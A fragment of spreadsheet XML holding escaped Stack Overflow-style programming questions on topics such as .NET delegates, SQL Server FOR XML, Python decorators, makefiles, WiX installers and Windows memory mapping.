</t>
  </si>
  <si>
    <t>Does using delegates slow down my .NET programs?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does using delegates slow down my programs?  &lt;/p&gt;
&lt;p&gt;I've been avoiding them because I really have no clue if they make my programs any slower.  I know if I cause a (catch) exception, that uses quite a bit of CPU power but I don't know about Delegates and Events and what .NET does to them.  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a free (LGPL, BSD, etc) implementation of XML editor swing component</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need a JComponent thad enables editing xml documents so I can embed it in my application.&lt;/p&gt;
&lt;p&gt;It doesnt need to bee fancy.&lt;/p&gt;
&lt;p&gt;Plain text editing and highlighting would bee enough.&lt;/p&gt;
&lt;p&gt;Thank in advance&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Enabling Auditing feature in SQLServer 2005</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Did you ever use SQL Server auditing features on a production db?&lt;/p&gt;
&lt;p&gt;How did that impact on performances, and are there differences you noticed between different versions of SQL Server.&lt;/p&gt;
&lt;p&gt;Also how we need to enable the audit features.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Boost Spirit crash when used in DLLs</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am experiencing a crash while using the Boost.Spirit and Boost.Thread 
libraries in my application. This only happens if I have used the Spirit 
parser during the lifetime of the process from the main thread.&lt;/p&gt;
&lt;p&gt;The crash happens at exit and appears to be related to the clean-up of 
thread specific storage allocated by the Spirit parser.
It is probably crashing due to the sequence of which DLLs are 
unloaded, as the thread specific memory is allocated inside a DLL
that has already been unloaded. The Boost.Thread DLL is however not unloaded untill the application itself exits.&lt;/p&gt;
&lt;p&gt;Is there a way for me to force Spirit to clean out its thread specific 
storage, e.g. in my dll-main when i get a process-detach notification?&lt;/p&gt;
&lt;p&gt;Any solutions/hints would be appreciated.&lt;/p&gt;
&lt;p&gt;PS!
My platform and settings:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Visual Studio 2005&lt;/li&gt;
&lt;li&gt;BOOST_ALL_DYN_LINK&lt;/li&gt;
&lt;li&gt;BOOST_SPIRIT_THREADSAFE&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>Which Triplestore for rapid semantic web development?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Ease of installation/use is the most important factor here - not performance.&lt;/p&gt;
&lt;p&gt;Small is OK as large datasets are not expected.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to choose returned column name in a SELECT FOR XML query?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;MS SQL has a convenient workaround for concatenating a column value from multiple rows into one value:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT col1
 FROM table1
 WHERE col2 = 'x'
 ORDER by col3
 FOR XML path('')
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and that returns a nice recordset:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;XML_F52E2B61-18A1-11d1-B105-00805F49916B                                     
---------------------------------------- 
&amp;lt;col1&amp;gt;Foo&amp;lt;/col1&amp;gt;&amp;lt;col1&amp;gt;Bar&amp;lt;/col1&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;only the column name in the returned recordset is rather nasty!&lt;/p&gt;
&lt;p&gt;The column name seems to include random elements (or a GUID), and hence I am reluctant to use it in my application (different instances or different servers might have another GUID).  Unfortunately I cannot use * to select the value, and due to the restrictions in the existing application I cannot iterate through returned columns, either...&lt;/p&gt;
&lt;p&gt;Is there a way to force the column name in the returned recordset to something more sensible?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Detecting if an Oracle Database is Installed</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I was wondering if there was a way to tell if an instance of Oracle on a system has a database installed or not?&lt;/p&gt;
&lt;p&gt;This is for an installation script, and I need to verify that there is an actual database in place before proceeding with the loading of my own tablespace onto that database. Has anyone tackled this problem before?&lt;/p&gt;
&lt;p&gt;Cheers&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Base64ing Unicode characters</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can &lt;a href="http://en.wikipedia.org/wiki/Unicode"&gt;Unicode&lt;/a&gt; characters be encoded and decoded with &lt;a href="http://en.wikipedia.org/wiki/Base64"&gt;Base64&lt;/a&gt;?&lt;/p&gt;
&lt;p&gt;I have attempted to encode the string 'Ø§Ù„Ù„Ù‡', but when I decoded it all I got was '????'.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>WPF: Can I restyle a checkbox template, so that the checkindicator is a red cross instead</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I canÂ´t find a way to restyle the IsChecked indicator of a checkbox. As I can see from the checkbox template thereÂ´s no possibilities to restyle the indicator, just the "box" of the checkbox. Does anyone knows if itÂ´s possibly to restyle the IsChecked indicator?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Which is the best Maven Eclipse plugin?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;There is two available Eclipse plugins for Maven :&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="http://www.eclipse.org/proposals/iam/"&gt;Eclipse IAM&lt;/a&gt; (old name is Q4E)&lt;/li&gt;
&lt;li&gt;&lt;a href="http://m2eclipse.codehaus.org/"&gt;m2eclipse&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;m2eclipse seems to be the oldest but the more robust. Is there any key differences between the two ?&lt;/p&gt;
&lt;p&gt;Which one should be chosen for a project starting today and why ?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;UPDATE:&lt;/strong&gt; m2eclipse is moving to eclipse.org and will be included in the Indigo release train (Eclipse 3.7). See &lt;a href="http://www.sonatype.com/people/2010/12/m2e-at-eclipse-what-will-this-mean-for-you/"&gt;m2e at Eclipse: What will this mean for you?&lt;/a&gt; and &lt;a href="http://www.eclipse.org/m2e/"&gt;m2eclipse is moving to eclipse.org!&lt;/a&gt;. The accepted answer is thus even more correct.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>From AS2 to AS3 what is the equvalent of _root?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to learn Actionscript 2 or 3, with AS2 I eventually figured by trial and error that I could get any named instance and modify it using a string with its name using&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var theinstance = "titletext"; // actually exctracted from an array
_root[theinstance].htmlText = "New text with &amp;lt;b&amp;gt;HTML!&amp;lt;/b&amp;gt;";
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but when trying to convert the code to AS3 &lt;code&gt;_root&lt;/code&gt; doesn't exist anymore. According to the &lt;a href="http://livedocs.adobe.com/flex/3/langref/migration.html" rel="nofollow"&gt;migration doc&lt;/a&gt; it is somehow replaced by &lt;code&gt;flash.display.DisplayObject.stage&lt;/code&gt; but apparently this is not how to do it:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;flash.display.DisplayObject.stage[theinstance].htmlText = "New text with &amp;lt;b&amp;gt;HTML!&amp;lt;/b&amp;gt;";
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and neither is this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;flash.display.DisplayObject.stage.getChildByName(theinstance).htmlText = "New text with &amp;lt;b&amp;gt;HTML!&amp;lt;/b&amp;gt;";
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How &lt;em&gt;do&lt;/em&gt; I get a child by name in actionscript 3?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What do you call a chart that illustrates class hierarchy?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So I have a UML type chart that documents the classes and the hierarchy of a development. Just don't know what you'd call it?&lt;/p&gt;
&lt;p&gt;Any suggestions?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to determine if a string is a number in C#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am working on a tool where I need to convert string values to their proper object types. E.g. convert a string like &lt;code&gt;"2008-11-20T16:33:21Z"&lt;/code&gt; to a &lt;code&gt;DateTime&lt;/code&gt; value. Numeric values like &lt;code&gt;"42"&lt;/code&gt; and &lt;code&gt;"42.42"&lt;/code&gt; must be converted to an &lt;code&gt;Int32&lt;/code&gt; value and a &lt;code&gt;Double&lt;/code&gt; value respectively. &lt;/p&gt;
&lt;p&gt;What is the best and most efficient approach to detect if a string is an integer or a number? Are &lt;code&gt;Int32.TryParse&lt;/code&gt; or &lt;code&gt;Double.TryParse&lt;/code&gt; the way to go? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Avg on datetime in Access</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am porting some queries from Access to T-SQL and those who wrote the queries used the Avg aggregate function on datetime columns.  This is not supported in T-SQL and I can understand why - it doesn't make sense.  What is getting averaged?&lt;/p&gt;
&lt;p&gt;So I was about to start reverse engineering what Access does when it aggregates datetime using Avg, but thought I would throw the question out here first.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why bundle version control plugin with IDE?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I was always wandering why it is a big deal having version control support inside an IDE. &lt;/p&gt;
&lt;p&gt;I always preferred to use commandline/standalone version of version control of choice, and never found IDE integration helpful.&lt;/p&gt;
&lt;p&gt;I know it can be helpfull sometimes, for example to automatically keep track of renames, but I was bitten by version control plugins couple of times (especialy Clear Case Eclipse plugin) that I'm now finding it counter productive compared to commanline version, where I have better control.&lt;/p&gt;
&lt;p&gt;What is your opinion?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is Cassini's (aka VS Dev Server) stack limit?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm running into a StackOverflowException (please don't ask, it's not my fault) in IIS6/2k3 which has a limit of 256k, but the exception &lt;em&gt;doesn't happen&lt;/em&gt; in the VS debugger. &lt;/p&gt;
&lt;p&gt;As a matter of understanding I'd love to know, but have failed to google what the stack limit of Cassini is...if indeed it has one?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How would you construct and interact with a grid like a Sudoku board?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What do you think is the best way to implement an interactive grid similar to a Sudoku board for a native iPhone application?  I did not see an object to fill this need in the SDK.&lt;/p&gt;
&lt;p&gt;Should I make a custom control for an individual cell, then initialize as many of them as I need in a grid form?&lt;/p&gt;
&lt;p&gt;&lt;img src="http://www.sudoku.4thewww.com/Grids/grid.jpg" alt="Sudoku grid" /&gt;&lt;/p&gt;
&lt;p&gt;Any and all comments are welcome.
Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Accessing Environment Variables from Windows Services</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am attempting to write a Windows Service in C#.  I need to find the path to a certain file, which is stored in an environment variable.  In a regular C# console application, I can achieve that with the following line:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;string t = System.Environment.GetEnvironmentVariable("TIP_HOME");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If I write that to the console I see that it was successful.&lt;/p&gt;
&lt;p&gt;Now, if I try that same code in a Windows Service, the string &lt;code&gt;t&lt;/code&gt; is empty.&lt;/p&gt;
&lt;p&gt;Any idea why?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Hibernate Annotation Placement Question</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got what I think is a simple question.  I've seen examples both ways.  The question is - "why can't I place my annotations on the field?".  Let me give you an example....&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;@Entity
@Table(name="widget")
public class Widget {
 private Integer id;
 @Id
 @GeneratedValue(strategy=GenerationType.AUTO)
 public Integer getId() { return this.id; }
 public Integer setId(Integer Id) { this.id = id;}
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The above code works fine (assuming there's not a typo in there).  When the annotation is placed on the getter of the property everything is perfect.&lt;/p&gt;
&lt;p&gt;However, that seems awkward to me.  In my mind it's cleaner to place the annotation on the field, like so --&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;@Entity
@Table(name="widget")
public class Widget {
 @Id
 @GeneratedValue(strategy=GenerationType.AUTO)
 private Integer id;
 public Integer getId() { return this.id; }
 public Integer setId(Integer Id) { this.id = id;}
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I've seen examples of both ways.  However, when I run this second example I get the following...&lt;/p&gt;
&lt;pre&gt;
java.lang.NullPointerException
    at com.widget.util.hibernate.HibernateSessionFactory$ThreadLocalSession.initialValue(HibernateSessionFactory.java:25)
    at com.widget.util.hibernate.HibernateSessionFactory$ThreadLocalSession.initialValue(HibernateSessionFactory.java:1)
    at java.lang.ThreadLocal$ThreadLocalMap.getAfterMiss(Unknown Source)
    at java.lang.ThreadLocal$ThreadLocalMap.get(Unknown Source)
    at java.lang.ThreadLocal$ThreadLocalMap.access$000(Unknown Source)
    at java.lang.ThreadLocal.get(Unknown Source)
    at com.widget.util.hibernate.HibernateSessionFactory.get(HibernateSessionFactory.java:33)
    at com.widget.db.dao.AbstractDao.(AbstractDao.java:12)
    at com.widget.db.dao.WidgetDao.(WidgetDao.java:9)
    at com.widget.db.dao.test.WidgetDaoTest.findById(WidgetDaoTest.java:17)
    at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
    at sun.reflect.NativeMethodAccessorImpl.invoke(Unknown Source)
    at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
    at java.lang.reflect.Method.invoke(Unknown Source)
    ...
&lt;/pre&gt;
&lt;p&gt;Here's the skeleton of &lt;code&gt;HibernateSessionFactory&lt;/code&gt; (line 25 is marked) ....&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;protected Session initialValue() {
	SessionFactory sessionFactory = null;
	try {
		Configuration cfg = new AnnotationConfiguration().configure();
		String url = System.getProperty("jdbc.url");
		if (url != null) {
			cfg.setProperty("hibernate.connection.url", url);
		}
		sessionFactory = cfg.buildSessionFactory();
	}
	catch (Exception e) {
	}
	Session session = sessionFactory.openSession();  // LINE 25
	return session;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Anyone have an idea what's going on here?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the optimal productivity stack for developers?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the optimal &lt;a href="http://www.blog.stackingit.com/2008/11/productivity-stack-is-not-about.html" rel="nofollow"&gt;productivity stack&lt;/a&gt; for developers?&lt;/p&gt;
&lt;p&gt;When deciding what to include in your personal productivity stack, what criteria do you use?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Windows 2008 concurrent TCPIP connections</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In Windows XP, Microsoft took the decision to limit the number of half open connections in later service packs. Patching tcpip.sys was rumoured to fix this. Does such a limit exist in Windows 2008, and if so, is it configurable?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Installing Capicom without SelfReg: Wix Custom Actions Not Found (Err 2721)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;After following the advice in &lt;a href="http://stackoverflow.com/questions/302560/wix-custom-actions-with-wixuiminimal"&gt;this question&lt;/a&gt; successfully, I added a couple additional lines of code for another custom action.  This one is intended to call regsvr32 on the copy of capicom which I've tried to put in the user's system folder.  However, I'm getting error 2721, which seems to be a custom action not found error, from what I've seen.  Any suggestions? I'm trying to maintain consistency with previous iterations of my installer by calling regsvr, rather than just adding the registry entries during install, which could be a good idea instead.  :::shrug:::&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;Directory Id="SystemFolder" Name="Sys"&amp;gt;
  ...
  &amp;lt;component ...&amp;gt;
     ...
    &amp;lt;File Id="CapiCom.Dll" LongName="CapiCom.Dll" Name="CAPICOM.DLL" Source=... /&amp;gt;
  &amp;lt;/component&amp;gt;
&amp;lt;/directory&amp;gt;
...
&amp;lt;CustomAction Id="REGCAPICOM" ExeCommand='regsvr32.exe "[SystemFolder]capicom.dll"' Return = "ignore" Execute="deferred" /&amp;gt;
...
&amp;lt;InstallExecuteSequence&amp;gt;
  ...
  &amp;lt;Custom Action="REGCAPICOM" After="InstallFiles" /&amp;gt;
&amp;lt;/InstallExecuteSequence&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Edit: Yes, using regsvr32 as an installer is ugly.  But when I downloaded the Capicom SDK, that is what MS said to do in order to install it.  Searching around has found many people saying that this is a stupid way to do it...but it's also mechanism MS provided.  I'll listen to suggestions for a better way.  I don't consider it a big deal if Capicom being left behind when my application is uninstalled, considering that it's a standard windows component.&lt;/p&gt;
&lt;p&gt;Edit: Hmmm.  Apparently, one of the things running selfreg on the dll does is to create a random seed to add to the registry.  Not sure what mechanism it uses to generate this seed but I suspect it would be considered in poor taste to just generate one myself, especially if I gave all the users the same seed.  Not sure....  Apparently if I skip this Capicom does it on its own, so I'm fine.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET Membership: Login Controls Source Code</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is the source code for the common login controls available?&lt;/p&gt;
&lt;p&gt;Those are the controls which are available under Login section in Toolbox: &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Login,  &lt;/li&gt;
&lt;li&gt;LoginView, &lt;/li&gt;
&lt;li&gt;PasswordRecovery,&lt;/li&gt;
&lt;li&gt;LoginStatus, &lt;/li&gt;
&lt;li&gt;LoginName,&lt;/li&gt;
&lt;li&gt;CreateUserWizard, &lt;/li&gt;
&lt;li&gt;ChangePassword&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Eventually could you point me to a good source of custom implementation of functionality that those controls provide, or some guidance on implementing this functionality without using the mentioned controls.&lt;/p&gt;
&lt;p&gt;I am using Visual Studio 2005 (.net2)&lt;/p&gt;
&lt;p&gt;I will be using SQLMembershipProvider as the MembershipProvider but that probably should make no difference.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Python decorator makes function forget that it belongs to a class</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to write a decorator to do logging:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;def logger(myFunc):
    def new(*args, **keyargs):
        print 'Entering %s.%s' % (myFunc.im_class.__name__, myFunc.__name__)
        return myFunc(*args, **keyargs)
    return new
class C(object):
    @logger
    def f():
        pass
C().f()
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I would like this to print:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Entering C.f
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but instead I get this error message:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;AttributeError: 'function' object has no attribute 'im_class'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Presumably this is something to do with the scope of 'myFunc' inside 'logger', but I've no idea what.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to boost productivity in my Flex/Java stack?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am embarking on a new RIA project with Java on the backend. I'm the only developer, and the app is a line-of-business application. My current stack looks like this:&lt;/p&gt;
&lt;p&gt;MySQL || Spring(JdbcTemplate for data access) || BlazeDS (remoting) || Flex(Cairngorm)&lt;/p&gt;
&lt;p&gt;My question is: what changes can I make to improve productivity? Manually coding SQL, server-side entity objects, client-side value objects and all the Cairngorm stuff is obviously a drag, but I'm not sure what higher-level frameworks to introduce.&lt;/p&gt;
&lt;p&gt;What Flex/Java stack has served you well? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I randomly select an item from a list using Python?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Assume I have the following list:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;foo = ['a', 'b', 'c', 'd', 'e']
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What is the simplest way to retrieve an item at random from this list?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Accessing parent elements in an object model efficiently</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a following object model:&lt;/p&gt;
&lt;pre&gt;
- Book 
-- Chapter 1
--- Page 1
---- Image 1 
---- Image 2
---- Text 1
--- Page 2 
...
&lt;/pre&gt;
&lt;p&gt;Resources are way down at the page level. But, I need to know the full path to resources, from the resources' point of view. &lt;/p&gt;
&lt;p&gt;One way, is to have resources be aware of their parents. &lt;/p&gt;
&lt;p&gt;So my Image object could have a "parentPage" property, which in turn could have a "parentChapter" property. This way, I could access the complete path via currentImage.parentPage.parentChapter. Is there a better way?&lt;/p&gt;
&lt;p&gt;A couple of words on why I'd need to know the full path from a resource's point of view. I have an object model that gets walked and rendered on screen. The renderer descends from chapter level all the way down into the element/resource level (this is where the rendering occurs). However to display the resources, I need to know where they live (ie the actual path on disk) and this information is typically specified at the Chapter level.&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
&lt;p&gt;-- Edit --
Just to clarify, is this parent.parent approach the best? It forces child objects to know about the parents, which makes me uncomfortable. Coupling?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I create a web application where I do not have access to the data?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;em&gt;Premise&lt;/em&gt;: The requirements for an upcoming project include the fact that no one except for authorized users have access to certain data. This is usually fine, but this circumstance is not usual. The requirements state that there be no way for even the programmer or any other IT employee be able to access this information. (They want me to store it without being able to see it, ever.)&lt;/p&gt;
&lt;p&gt;In all of the scenarios I've come up with, I can always find a way to access the data. Let me describe some of them.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Scenario I:&lt;/strong&gt; Restrict the table on the live database so that only the SQL Admin can access it directly.&lt;br&gt;
&lt;strong&gt;Hack 1:&lt;/strong&gt; I rollout a change that sends the data to a different table for later viewing. Also, the SQL Admin can see the data, which breaks the requirement.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Scenario II:&lt;/strong&gt; Encrypt the data so that it requires a password to decrypt. This password would be known by the users only. It would be required each time a new record is created as well as each time the data from an old record was retrieved. The encryption/decryption would happen in JavaScript so that the password would never be sent to the server, where it could be logged or sniffed.&lt;br&gt;
&lt;strong&gt;Hack II:&lt;/strong&gt; Rollout a change that logs keypresses in javascript and posts them back to the server so that I can retrieve the password. Or, rollout a change that simply stores the unecrypted data in a hidden field that can be posted to the server for later viewing.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Scenario III:&lt;/strong&gt; Do the same as Scenario II, except that the encryption/decryption happens on a website that we do not control. This magic website would allow a user to input a password and the encrypted or plain-text data, then use javascript to decrypt or encrypt that data. Then, the user could just copy the encrypted text and put the in the field for new records. They would also have to use this site to see the plain-text for old records.&lt;br&gt;
&lt;strong&gt;Hack III:&lt;/strong&gt; Besides installing a full-fledged key logger on their system, I don't know how to break this one.&lt;/p&gt;
&lt;p&gt;So, Scenario III looks promising, but it's cumbersome for the users. Are there any other possibilities that I may be overlooking?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Create a makefile for multiple OSes, this make (ext?) doesn't work?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a working makefile that builds with mingw32. Now i renamed that makefile to Makefile.w32 (source -&gt; &lt;a href="http://pastie.org/319964" rel="nofollow"&gt;http://pastie.org/319964&lt;/a&gt;)&lt;/p&gt;
&lt;p&gt;Now i have a Makefile with the following. The problem is, it does not build my source&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;all:
    make mingw32
clean:
    @echo "causes an infinite loop -&amp;gt; make mingw32 clean"
mingw32:
    @echo "yeahhhhhhhhh"
    make Makefile.w32
mingw32-clean:
    @echo "mingw clean"
    make Makefile.w32 clean
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;result:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;gt; "make" 
make mingw32
make[1]: Entering directory `/c/nightly/test'
yeahhhhhhhhh
make Makefile.w32
make[2]: Entering directory `/c/nightly/test'
make[2]: Nothing to be done for `Makefile.w32'.
make[2]: Leaving directory `/c/nightly/test'
make[1]: Leaving directory `/c/nightly/test'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It seems to me it doesn't like Makefile.w32 extension. I dont understand why it isn't building. It;s obviously getting to my "make Makefile.w32" line.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Search for a regexp in a java arraylist</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;pre&gt;&lt;code&gt;ArrayList &amp;lt;String&amp;gt; list = new ArrayList(); 
list.add("behold");
list.add("bend");
list.add("bet");
list.add("bear");
list.add("beat");
list.add("become");
list.add("begin");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;There is a way to search for the regexp bea.* and get the indexes like in ArrayList.indexOf ?&lt;/p&gt;
&lt;p&gt;EDIT: returning the items is fine but I need something with more performance than a Linear search&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.net 2.0 Gridview with Expanding Panel Rows -- How to build Panel "on the fly"</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm currently building a Gridview that has expandable rows. Each row contains a dynamically created Panel of Form elements. Right now, I have a javascript function that expands (or in my case, makes visible) the panel when an Image is clicked on the Gridview row.&lt;/p&gt;
&lt;p&gt;My question is... is there a more efficient way of doing this. Instead of pulling all my data to begin with and building each new row as I Databind, is there a way to simple create the row with the Panel full of textboxes and dropdownlists on the fly when the user clicks the Expand button?"&lt;/p&gt;
&lt;p&gt;I'd like to limit the server calls by doing it that way instead of how I'm currently doing it, looping through every row and creating a new panel with form elements and inserting that into a row that is hidden.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Vector Shape on Stage Appears Over Dynamic Textfield</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The subject pretty much explains it all. I start on frame one of a MovieClip with just a Bitmap covering the whole stage.&lt;/p&gt;
&lt;p&gt;Then when a user clicks a button, it goes to frame two and a vector shape is on the stage covering part of the image. At the same time, through code, I place an input Textfield on the stage.&lt;/p&gt;
&lt;p&gt;Problem is, the dynamically created Textfield is appearing UNDER the vector shape (which was drawn on the stage)! This seems to be a problem that is new to ActionScript 3, as I did not have this problem with Flash CS3 and ActionScript 2.&lt;/p&gt;
&lt;p&gt;I've tried putting the Textfield on different layers, but to no avail. How do I get the Textfield to appear over the vector shape?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>makefile calling makefile error</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a working make, I have platform code and like several makes for each os in the folder. Right now I have one makefile which works. I renamed it to Makefile.ws and wrote this in Makefile&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;all:
    make -f Makefile.w32
clean:
    make -f Makefile.w32 clean
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I ran it and got this error&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;gt; "make" 
make -f Makefile.w32
make[1]: Entering directory `/c/nightly/test'
make -f Makefile.w32
make[3]: Makefile.w32: No such file or directory
make[3]: *** No rule to make target `Makefile.w32'.  Stop.
make[2]: *** [all] Error 2
make[1]: *** [build] Error 2
make[1]: Leaving directory `/c/nightly/test'
"make": *** [all] Error 2
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Oddly enough the clean works perfectly. Then I decided to write "make -f Makefile.w32 mingw32" and that did not work correctly. In fact it made a folder called mingw32 which I thought was very strange.&lt;/p&gt;
&lt;p&gt;As for the mingw32 rule I just copy build which I suspect is the main/normal rule that is used to build&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$(BUILD):
    @[ -d $@ ] || mkdir -p $@
    @make --no-print-directory -C $(BUILD) -f $(CURDIR)/Makefile
mingw32:
    @[ -d $@ ] || mkdir -p $@
    @make --no-print-directory -C $(BUILD) -f $(CURDIR)/Makefile
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;full .w32 source is here  &lt;a href="http://pastie.org/320035" rel="nofollow"&gt;http://pastie.org/320035&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the purpose of allocating pages in the pagefile with CreateFileMapping?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The function &lt;a href="http://msdn.microsoft.com/en-us/library/aa366537(VS.85).aspx" rel="nofollow"&gt;CreateFileMapping&lt;/a&gt; can be used to allocate space in the pagefile (if the first argument is &lt;code&gt;INVALID_HANDLE_VALUE&lt;/code&gt;).  The allocated space can later be memory mapped into the process virtual address space.&lt;/p&gt;
&lt;p&gt;Why would I want to do this instead of using just &lt;a href="http://msdn.microsoft.com/en-us/library/aa366887(VS.85).aspx" rel="nofollow"&gt;VirtualAlloc&lt;/a&gt;?&lt;/p&gt;
&lt;p&gt;It seems that both functions do almost the same thing.  Memory allocated by VirtualAlloc may at some point be pushed out to the pagefile.  Why should I need an API that specifically requests that my pages be allocated there in the first instance?  Why should I care where my private pages live?&lt;/p&gt;
&lt;p&gt;Is it just a hint to the OS about my expected memory usage patterns?  (Ie, the former is a hint to swap out those pages more aggressively.)&lt;/p&gt;
&lt;p&gt;Or is it simply a convenience method when working with very large datasets on 32-bit processes?  (Ie, I can use CreateFileMapping to make &gt;4Gb allocations, then memory map smaller chunks of the space as needed.  Using the pagefile saves me the work of manually managing my own set of files to "swap" to.)&lt;/p&gt;
&lt;p&gt;PS. This question is sparked by an article I read recently: &lt;a href="http://blogs.technet.com/markrussinovich/archive/2008/11/17/3155406.aspx" rel="nofollow"&gt;http://blogs.technet.com/markrussinovich/archive/2008/11/17/3155406.aspx&lt;/a&gt;&lt;/p&gt;
</t>
